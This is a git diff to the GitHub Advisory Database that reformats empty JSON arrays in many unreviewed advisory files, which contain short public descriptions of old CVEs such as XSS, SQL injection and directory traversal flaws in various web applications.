Patches\n\nUpgrade to version 4.1.7 or higher. Alternatively use 'v4' tag which points to the latest and secure version.\n\n### References\n\n- https://snyk.io/research/zip-slip-vulnerability\n- https://github.com/actions/download-artifact/releases/tag/v4.1.7\n\n### CVE\n\nCVE-2024-42471\n\n### Credits\n\nJustin Taft from Google", "severity": [ diff --git a/advisories/unreviewed/2021/12/GHSA-4h4x-cgp7-h27m/GHSA-4h4x-cgp7-h27m.json b/advisories/unreviewed/2021/12/GHSA-4h4x-cgp7-h27m/GHSA-4h4x-cgp7-h27m.json index deda74075d2..4a53ddec260 100644 --- a/advisories/unreviewed/2021/12/GHSA-4h4x-cgp7-h27m/GHSA-4h4x-cgp7-h27m.json +++ b/advisories/unreviewed/2021/12/GHSA-4h4x-cgp7-h27m/GHSA-4h4x-cgp7-h27m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/02/GHSA-mv36-g4g7-p396/GHSA-mv36-g4g7-p396.json b/advisories/unreviewed/2022/02/GHSA-mv36-g4g7-p396/GHSA-mv36-g4g7-p396.json index 0648275d24b..55bacfaaa4f 100644 --- a/advisories/unreviewed/2022/02/GHSA-mv36-g4g7-p396/GHSA-mv36-g4g7-p396.json +++ b/advisories/unreviewed/2022/02/GHSA-mv36-g4g7-p396/GHSA-mv36-g4g7-p396.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/04/GHSA-ffgj-53w4-8794/GHSA-ffgj-53w4-8794.json b/advisories/unreviewed/2022/04/GHSA-ffgj-53w4-8794/GHSA-ffgj-53w4-8794.json index b5534cab435..506a0b55da3 100644 --- a/advisories/unreviewed/2022/04/GHSA-ffgj-53w4-8794/GHSA-ffgj-53w4-8794.json +++ b/advisories/unreviewed/2022/04/GHSA-ffgj-53w4-8794/GHSA-ffgj-53w4-8794.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/04/GHSA-qxgp-gpc4-hhg2/GHSA-qxgp-gpc4-hhg2.json b/advisories/unreviewed/2022/04/GHSA-qxgp-gpc4-hhg2/GHSA-qxgp-gpc4-hhg2.json index 69535ade297..97132a9d216 100644 --- a/advisories/unreviewed/2022/04/GHSA-qxgp-gpc4-hhg2/GHSA-qxgp-gpc4-hhg2.json +++ b/advisories/unreviewed/2022/04/GHSA-qxgp-gpc4-hhg2/GHSA-qxgp-gpc4-hhg2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-224f-2jgg-f9vc/GHSA-224f-2jgg-f9vc.json b/advisories/unreviewed/2022/05/GHSA-224f-2jgg-f9vc/GHSA-224f-2jgg-f9vc.json index 272a20db2e1..d97d0d5ac29 100644 --- a/advisories/unreviewed/2022/05/GHSA-224f-2jgg-f9vc/GHSA-224f-2jgg-f9vc.json +++ b/advisories/unreviewed/2022/05/GHSA-224f-2jgg-f9vc/GHSA-224f-2jgg-f9vc.json @@ -7,12 +7,8 @@ "CVE-2012-3259" ], "details": "Unspecified vulnerability in a SOAP feature in HP SiteScope 11.10 through 11.12 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1461.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-225w-f3mj-frvj/GHSA-225w-f3mj-frvj.json b/advisories/unreviewed/2022/05/GHSA-225w-f3mj-frvj/GHSA-225w-f3mj-frvj.json index a4e9ef499a7..1322ddb08fb 100644 --- a/advisories/unreviewed/2022/05/GHSA-225w-f3mj-frvj/GHSA-225w-f3mj-frvj.json +++ b/advisories/unreviewed/2022/05/GHSA-225w-f3mj-frvj/GHSA-225w-f3mj-frvj.json @@ -7,12 +7,8 @@ "CVE-2012-0714" ], "details": "Cross-site request forgery (CSRF) vulnerability in IBM Maximo Asset Management 6.2 through 7.5, as used in SmartCloud Control Desk, Tivoli Asset Management for IT, Tivoli Service Request Manager, Maximo Service Desk, and Change and Configuration Management Database (CCMDB), allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-23f5-wh7w-47gp/GHSA-23f5-wh7w-47gp.json b/advisories/unreviewed/2022/05/GHSA-23f5-wh7w-47gp/GHSA-23f5-wh7w-47gp.json index eff6b1b975f..f59c77830a5 100644 --- a/advisories/unreviewed/2022/05/GHSA-23f5-wh7w-47gp/GHSA-23f5-wh7w-47gp.json +++ b/advisories/unreviewed/2022/05/GHSA-23f5-wh7w-47gp/GHSA-23f5-wh7w-47gp.json @@ -7,12 +7,8 @@ "CVE-2011-5210" ], "details": "Directory traversal vulnerability in admin/preview.php in Limny 3.0.0 allows remote attackers to read arbitrary files via a ..%2F (encoded dot dot slash) in the theme parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-23hh-8f6m-x9cp/GHSA-23hh-8f6m-x9cp.json b/advisories/unreviewed/2022/05/GHSA-23hh-8f6m-x9cp/GHSA-23hh-8f6m-x9cp.json index 4dbc59312aa..ce9d974c281 100644 --- a/advisories/unreviewed/2022/05/GHSA-23hh-8f6m-x9cp/GHSA-23hh-8f6m-x9cp.json +++ b/advisories/unreviewed/2022/05/GHSA-23hh-8f6m-x9cp/GHSA-23hh-8f6m-x9cp.json @@ -7,12 +7,8 @@ "CVE-2012-2438" ], "details": "ar web content manager (AWCM) 2.2 does not restrict the number of comment records that can be submitted through HTTP requests, which allows remote attackers to cause a denial of service (disk consumption) via the coment parameter to (1) show_video.php or (2) topic.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2423-333r-g3m8/GHSA-2423-333r-g3m8.json b/advisories/unreviewed/2022/05/GHSA-2423-333r-g3m8/GHSA-2423-333r-g3m8.json index aecc5e84d34..0a648415755 100644 --- a/advisories/unreviewed/2022/05/GHSA-2423-333r-g3m8/GHSA-2423-333r-g3m8.json +++ b/advisories/unreviewed/2022/05/GHSA-2423-333r-g3m8/GHSA-2423-333r-g3m8.json @@ -7,12 +7,8 @@ "CVE-2012-2129" ], "details": "Cross-site scripting (XSS) vulnerability in doku.php in DokuWiki 2012-01-25 Angua allows remote attackers to inject arbitrary web script or HTML via the target parameter in an edit action.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-244q-6gfm-pphc/GHSA-244q-6gfm-pphc.json b/advisories/unreviewed/2022/05/GHSA-244q-6gfm-pphc/GHSA-244q-6gfm-pphc.json index eeeaf6b1020..524949b5f46 100644 --- a/advisories/unreviewed/2022/05/GHSA-244q-6gfm-pphc/GHSA-244q-6gfm-pphc.json +++ b/advisories/unreviewed/2022/05/GHSA-244q-6gfm-pphc/GHSA-244q-6gfm-pphc.json @@ -7,12 +7,8 @@ "CVE-2012-3124" ], "details": "Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect availability, related to Kernel/KSSL.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-248r-745f-7p46/GHSA-248r-745f-7p46.json b/advisories/unreviewed/2022/05/GHSA-248r-745f-7p46/GHSA-248r-745f-7p46.json index 4c507720803..d28cd37f3b5 100644 --- a/advisories/unreviewed/2022/05/GHSA-248r-745f-7p46/GHSA-248r-745f-7p46.json +++ b/advisories/unreviewed/2022/05/GHSA-248r-745f-7p46/GHSA-248r-745f-7p46.json @@ -7,12 +7,8 @@ "CVE-2012-2715" ], "details": "Cross-site scripting (XSS) vulnerability in the themes_links function in template.php in the Amadou theme module 6.x-1.x before 6.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors related to class attributes in a list of links.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-24cc-5mgg-6xch/GHSA-24cc-5mgg-6xch.json b/advisories/unreviewed/2022/05/GHSA-24cc-5mgg-6xch/GHSA-24cc-5mgg-6xch.json index 00d43c03d74..eb78d4f1e94 100644 --- a/advisories/unreviewed/2022/05/GHSA-24cc-5mgg-6xch/GHSA-24cc-5mgg-6xch.json +++ b/advisories/unreviewed/2022/05/GHSA-24cc-5mgg-6xch/GHSA-24cc-5mgg-6xch.json @@ -7,12 +7,8 @@ "CVE-2012-2762" ], "details": "SQL injection vulnerability in include/functions_trackbacks.inc.php in Serendipity 1.6.2 allows remote attackers to execute arbitrary SQL commands via the url parameter to comment.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-24m6-qmjg-grqr/GHSA-24m6-qmjg-grqr.json b/advisories/unreviewed/2022/05/GHSA-24m6-qmjg-grqr/GHSA-24m6-qmjg-grqr.json index 6f881abd282..16a7c15a2d7 100644 --- a/advisories/unreviewed/2022/05/GHSA-24m6-qmjg-grqr/GHSA-24m6-qmjg-grqr.json +++ b/advisories/unreviewed/2022/05/GHSA-24m6-qmjg-grqr/GHSA-24m6-qmjg-grqr.json @@ -7,12 +7,8 @@ "CVE-2012-3357" ], "details": "The SVN revision view (lib/vclib/svn/svn_repos.py) in ViewVC before 1.1.15 does not properly handle log messages when a readable path is copied from an unreadable path, which allows remote attackers to obtain sensitive information, related to a \"log msg leak.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-24xx-35j6-m7x4/GHSA-24xx-35j6-m7x4.json b/advisories/unreviewed/2022/05/GHSA-24xx-35j6-m7x4/GHSA-24xx-35j6-m7x4.json index a3e5961cee5..b7ea9c493a1 100644 --- a/advisories/unreviewed/2022/05/GHSA-24xx-35j6-m7x4/GHSA-24xx-35j6-m7x4.json +++ b/advisories/unreviewed/2022/05/GHSA-24xx-35j6-m7x4/GHSA-24xx-35j6-m7x4.json @@ -7,12 +7,8 @@ "CVE-2012-1026" ], "details": "Multiple SQL injection vulnerabilities in login2.php in XRay CMS 1.1.1 allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password parameters.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-259f-5jp2-pgmr/GHSA-259f-5jp2-pgmr.json b/advisories/unreviewed/2022/05/GHSA-259f-5jp2-pgmr/GHSA-259f-5jp2-pgmr.json index d523276afdc..025a32f1025 100644 --- a/advisories/unreviewed/2022/05/GHSA-259f-5jp2-pgmr/GHSA-259f-5jp2-pgmr.json +++ b/advisories/unreviewed/2022/05/GHSA-259f-5jp2-pgmr/GHSA-259f-5jp2-pgmr.json @@ -7,12 +7,8 @@ "CVE-2012-2871" ], "details": "libxml2 2.9.0-rc1 and earlier, as used in Google Chrome before 21.0.1180.89, does not properly support a cast of an unspecified variable during handling of XSL transforms, which allows remote attackers to cause a denial of service or possibly have unknown other impact via a crafted document, related to the _xmlNs data structure in include/libxml/tree.h.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -80,9 +76,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-25h7-w4hq-hgjg/GHSA-25h7-w4hq-hgjg.json b/advisories/unreviewed/2022/05/GHSA-25h7-w4hq-hgjg/GHSA-25h7-w4hq-hgjg.json index 98dbbd814a2..b5b50be4080 100644 --- a/advisories/unreviewed/2022/05/GHSA-25h7-w4hq-hgjg/GHSA-25h7-w4hq-hgjg.json +++ b/advisories/unreviewed/2022/05/GHSA-25h7-w4hq-hgjg/GHSA-25h7-w4hq-hgjg.json @@ -7,12 +7,8 @@ "CVE-2012-2729" ], "details": "Multiple cross-site request forgery (CSRF) vulnerabilities in the SimpleMeta module 6.x-1.x before 6.x-2.0 for Drupal allow remote attackers to hijack the authentication of administrators for requests that (1) delete or (2) add a meta tag entry.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-25m8-8r8g-crmg/GHSA-25m8-8r8g-crmg.json b/advisories/unreviewed/2022/05/GHSA-25m8-8r8g-crmg/GHSA-25m8-8r8g-crmg.json index 5326ad2d712..f86295eb457 100644 --- a/advisories/unreviewed/2022/05/GHSA-25m8-8r8g-crmg/GHSA-25m8-8r8g-crmg.json +++ b/advisories/unreviewed/2022/05/GHSA-25m8-8r8g-crmg/GHSA-25m8-8r8g-crmg.json @@ -7,12 +7,8 @@ "CVE-2011-5219" ], "details": "Directory traversal vulnerability in examples/show_code.php in mPDF 5.3 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-25r3-fx4p-7qc5/GHSA-25r3-fx4p-7qc5.json b/advisories/unreviewed/2022/05/GHSA-25r3-fx4p-7qc5/GHSA-25r3-fx4p-7qc5.json index 2e93a5e6606..4a843a3371a 100644 --- a/advisories/unreviewed/2022/05/GHSA-25r3-fx4p-7qc5/GHSA-25r3-fx4p-7qc5.json +++ b/advisories/unreviewed/2022/05/GHSA-25r3-fx4p-7qc5/GHSA-25r3-fx4p-7qc5.json @@ -7,12 +7,8 @@ "CVE-2011-4832" ], "details": "Directory traversal vulnerability in CaupoShop Pro 2.x, CaupoShop Classic 3.01, and CaupoShop Pro 3.70 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the template parameter in a template action.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-266j-ggfg-wh9m/GHSA-266j-ggfg-wh9m.json b/advisories/unreviewed/2022/05/GHSA-266j-ggfg-wh9m/GHSA-266j-ggfg-wh9m.json index ffbe38a1fff..281442df611 100644 --- a/advisories/unreviewed/2022/05/GHSA-266j-ggfg-wh9m/GHSA-266j-ggfg-wh9m.json +++ b/advisories/unreviewed/2022/05/GHSA-266j-ggfg-wh9m/GHSA-266j-ggfg-wh9m.json @@ -7,12 +7,8 @@ "CVE-2012-2768" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in the topic administration page in the RTFM extension 2.0.4 through 2.4.3 for Best Practical Solutions RT allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-269r-ppxf-6rgm/GHSA-269r-ppxf-6rgm.json b/advisories/unreviewed/2022/05/GHSA-269r-ppxf-6rgm/GHSA-269r-ppxf-6rgm.json index ed177abf7e7..9878fd278d0 100644 --- a/advisories/unreviewed/2022/05/GHSA-269r-ppxf-6rgm/GHSA-269r-ppxf-6rgm.json +++ b/advisories/unreviewed/2022/05/GHSA-269r-ppxf-6rgm/GHSA-269r-ppxf-6rgm.json @@ -7,12 +7,8 @@ "CVE-2012-4057" ], "details": "Buffer overflow in the Player in Remote-Anything 5.60.15 allows remote attackers to execute arbitrary code via a crafted flm file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-26ch-x2j2-w6vx/GHSA-26ch-x2j2-w6vx.json b/advisories/unreviewed/2022/05/GHSA-26ch-x2j2-w6vx/GHSA-26ch-x2j2-w6vx.json index df36a9456cf..54978c5fd15 100644 --- a/advisories/unreviewed/2022/05/GHSA-26ch-x2j2-w6vx/GHSA-26ch-x2j2-w6vx.json +++ b/advisories/unreviewed/2022/05/GHSA-26ch-x2j2-w6vx/GHSA-26ch-x2j2-w6vx.json @@ -7,12 +7,8 @@ "CVE-2012-2737" ], "details": "The user_change_icon_file_authorized_cb function in /usr/libexec/accounts-daemon in AccountsService before 0.6.22 does not properly check the UID when copying an icon file to the system cache directory, which allows local users to read arbitrary files via a race condition.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-27gv-5xfq-qrc6/GHSA-27gv-5xfq-qrc6.json b/advisories/unreviewed/2022/05/GHSA-27gv-5xfq-qrc6/GHSA-27gv-5xfq-qrc6.json index 095ae2a12cc..e1514138ebc 100644 --- a/advisories/unreviewed/2022/05/GHSA-27gv-5xfq-qrc6/GHSA-27gv-5xfq-qrc6.json +++ b/advisories/unreviewed/2022/05/GHSA-27gv-5xfq-qrc6/GHSA-27gv-5xfq-qrc6.json @@ -7,12 +7,8 @@ "CVE-2012-0901" ], "details": "Cross-site scripting (XSS) vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-27v4-jvv2-r77h/GHSA-27v4-jvv2-r77h.json b/advisories/unreviewed/2022/05/GHSA-27v4-jvv2-r77h/GHSA-27v4-jvv2-r77h.json index 9eac0eec519..e6c3ce405f0 100644 --- a/advisories/unreviewed/2022/05/GHSA-27v4-jvv2-r77h/GHSA-27v4-jvv2-r77h.json +++ b/advisories/unreviewed/2022/05/GHSA-27v4-jvv2-r77h/GHSA-27v4-jvv2-r77h.json @@ -7,12 +7,8 @@ "CVE-2012-1656" ], "details": "SQL injection vulnerability in the Multisite Search module 6.x-2.2 for Drupal allows remote authenticated users with certain permissions to execute arbitrary SQL commands via the Site table prefix field.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2858-jrxx-h689/GHSA-2858-jrxx-h689.json b/advisories/unreviewed/2022/05/GHSA-2858-jrxx-h689/GHSA-2858-jrxx-h689.json index 3080911b603..2f8e30ff2ee 100644 --- a/advisories/unreviewed/2022/05/GHSA-2858-jrxx-h689/GHSA-2858-jrxx-h689.json +++ b/advisories/unreviewed/2022/05/GHSA-2858-jrxx-h689/GHSA-2858-jrxx-h689.json @@ -7,12 +7,8 @@ "CVE-2011-5139" ], "details": "SQL injection vulnerability in page.php in Pre Studio Business Cards Designer allows remote attackers to execute arbitrary SQL commands via the id parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-286p-v4j3-jjrh/GHSA-286p-v4j3-jjrh.json b/advisories/unreviewed/2022/05/GHSA-286p-v4j3-jjrh/GHSA-286p-v4j3-jjrh.json index 2834005c0dc..63dd18d6d5b 100644 --- a/advisories/unreviewed/2022/05/GHSA-286p-v4j3-jjrh/GHSA-286p-v4j3-jjrh.json +++ b/advisories/unreviewed/2022/05/GHSA-286p-v4j3-jjrh/GHSA-286p-v4j3-jjrh.json @@ -7,12 +7,8 @@ "CVE-2012-3223" ], "details": "Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking component in Oracle Financial Services Software 5.0.2, 5.0.5, 5.1.0, 5.2.0, 5.3.0 through 5.3.4, and 6.0.1 allows remote authenticated users to affect confidentiality, related to BASE.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-292r-44qm-39gx/GHSA-292r-44qm-39gx.json b/advisories/unreviewed/2022/05/GHSA-292r-44qm-39gx/GHSA-292r-44qm-39gx.json index ab397462579..b023733cda1 100644 --- a/advisories/unreviewed/2022/05/GHSA-292r-44qm-39gx/GHSA-292r-44qm-39gx.json +++ b/advisories/unreviewed/2022/05/GHSA-292r-44qm-39gx/GHSA-292r-44qm-39gx.json @@ -7,12 +7,8 @@ "CVE-2012-1221" ], "details": "Directory traversal vulnerability in the telnet server in RabidHamster R2/Extreme 1.65 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the File command.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2c95-h9c7-j48h/GHSA-2c95-h9c7-j48h.json b/advisories/unreviewed/2022/05/GHSA-2c95-h9c7-j48h/GHSA-2c95-h9c7-j48h.json index c1a63a328fd..6a69fc7894c 100644 --- a/advisories/unreviewed/2022/05/GHSA-2c95-h9c7-j48h/GHSA-2c95-h9c7-j48h.json +++ b/advisories/unreviewed/2022/05/GHSA-2c95-h9c7-j48h/GHSA-2c95-h9c7-j48h.json @@ -7,12 +7,8 @@ "CVE-2011-5189" ], "details": "Cross-site scripting (XSS) vulnerability in the Webform Validation module 6.x-1.x before 6.x-1.5 and 7.x-1.x before 7.x-1.1 for Drupal allows remote authenticated users with permissions to \"update Webform nodes\" to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2cqq-3cpj-9xcq/GHSA-2cqq-3cpj-9xcq.json b/advisories/unreviewed/2022/05/GHSA-2cqq-3cpj-9xcq/GHSA-2cqq-3cpj-9xcq.json index 6df3c369706..d49dd5d3bd0 100644 --- a/advisories/unreviewed/2022/05/GHSA-2cqq-3cpj-9xcq/GHSA-2cqq-3cpj-9xcq.json +++ b/advisories/unreviewed/2022/05/GHSA-2cqq-3cpj-9xcq/GHSA-2cqq-3cpj-9xcq.json @@ -7,12 +7,8 @@ "CVE-2012-2902" ], "details": "Unrestricted file upload vulnerability in editor/extensions/browser/file.php in the Joomla Content Editor (JCE) component before 2.1 for Joomla!, when chunking is set to greater than zero, allows remote authors to execute arbitrary PHP code by uploading a PHP file with a double extension as demonstrated by .jpg.pht.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2cv7-399j-p9vv/GHSA-2cv7-399j-p9vv.json b/advisories/unreviewed/2022/05/GHSA-2cv7-399j-p9vv/GHSA-2cv7-399j-p9vv.json index b659ffec951..3aac70e1d53 100644 --- a/advisories/unreviewed/2022/05/GHSA-2cv7-399j-p9vv/GHSA-2cv7-399j-p9vv.json +++ b/advisories/unreviewed/2022/05/GHSA-2cv7-399j-p9vv/GHSA-2cv7-399j-p9vv.json @@ -7,12 +7,8 @@ "CVE-2011-5216" ], "details": "SQL injection vulnerability in ajax.php in SCORM Cloud For WordPress plugin before 1.0.7 for WordPress allows remote attackers to execute arbitrary SQL commands via the active parameter. NOTE: some of these details are obtained from third party information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2f2q-j862-78mf/GHSA-2f2q-j862-78mf.json b/advisories/unreviewed/2022/05/GHSA-2f2q-j862-78mf/GHSA-2f2q-j862-78mf.json index 27f03e1f9c4..a6769baf801 100644 --- a/advisories/unreviewed/2022/05/GHSA-2f2q-j862-78mf/GHSA-2f2q-j862-78mf.json +++ b/advisories/unreviewed/2022/05/GHSA-2f2q-j862-78mf/GHSA-2f2q-j862-78mf.json @@ -7,12 +7,8 @@ "CVE-2012-2193" ], "details": "Cross-site scripting (XSS) vulnerability in Query Studio in IBM Cognos Business Intelligence (BI) 8.4.1 before IF1, 10.1 before IF2, 10.1.1 before IF2, and 10.2 before IF1 allows user-assisted remote attackers to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2g58-j9wc-pg3h/GHSA-2g58-j9wc-pg3h.json b/advisories/unreviewed/2022/05/GHSA-2g58-j9wc-pg3h/GHSA-2g58-j9wc-pg3h.json index 7cfe81efe46..7ee2da5a8af 100644 --- a/advisories/unreviewed/2022/05/GHSA-2g58-j9wc-pg3h/GHSA-2g58-j9wc-pg3h.json +++ b/advisories/unreviewed/2022/05/GHSA-2g58-j9wc-pg3h/GHSA-2g58-j9wc-pg3h.json @@ -7,12 +7,8 @@ "CVE-2012-3750" ], "details": "The Passcode Lock implementation in Apple iOS before 6.0.1 does not properly manage the lock state, which allows physically proximate attackers to bypass an intended passcode requirement and access Passbook passes via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2gjh-pw8m-qmpj/GHSA-2gjh-pw8m-qmpj.json b/advisories/unreviewed/2022/05/GHSA-2gjh-pw8m-qmpj/GHSA-2gjh-pw8m-qmpj.json index a4ed157ebfe..fad857a3dd2 100644 --- a/advisories/unreviewed/2022/05/GHSA-2gjh-pw8m-qmpj/GHSA-2gjh-pw8m-qmpj.json +++ b/advisories/unreviewed/2022/05/GHSA-2gjh-pw8m-qmpj/GHSA-2gjh-pw8m-qmpj.json @@ -7,12 +7,8 @@ "CVE-2012-3498" ], "details": "PHYSDEVOP_map_pirq in Xen 4.1 and 4.2 and Citrix XenServer 6.0.2 and earlier allows local HVM guest OS kernels to cause a denial of service (host crash) and possibly read hypervisor or guest memory via vectors related to a missing range check of map->index.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2grg-mh77-gc8w/GHSA-2grg-mh77-gc8w.json b/advisories/unreviewed/2022/05/GHSA-2grg-mh77-gc8w/GHSA-2grg-mh77-gc8w.json index 8680ee4e5f8..017529340ed 100644 --- a/advisories/unreviewed/2022/05/GHSA-2grg-mh77-gc8w/GHSA-2grg-mh77-gc8w.json +++ b/advisories/unreviewed/2022/05/GHSA-2grg-mh77-gc8w/GHSA-2grg-mh77-gc8w.json @@ -7,12 +7,8 @@ "CVE-2011-5190" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in Social Book Facebook Clone 2010 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO parameter to (1) signup.php, (2) lostpass.php, (3) login.php, (4) index.php, (5) help_tos.php, (6) help_contact.php, or (7) help.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2hmv-7h55-42vc/GHSA-2hmv-7h55-42vc.json b/advisories/unreviewed/2022/05/GHSA-2hmv-7h55-42vc/GHSA-2hmv-7h55-42vc.json index eea6172b045..3536c508c25 100644 --- a/advisories/unreviewed/2022/05/GHSA-2hmv-7h55-42vc/GHSA-2hmv-7h55-42vc.json +++ b/advisories/unreviewed/2022/05/GHSA-2hmv-7h55-42vc/GHSA-2hmv-7h55-42vc.json @@ -7,12 +7,8 @@ "CVE-2012-1715" ], "details": "Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.3 allows remote attackers to affect integrity, related to HTML Pages.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, 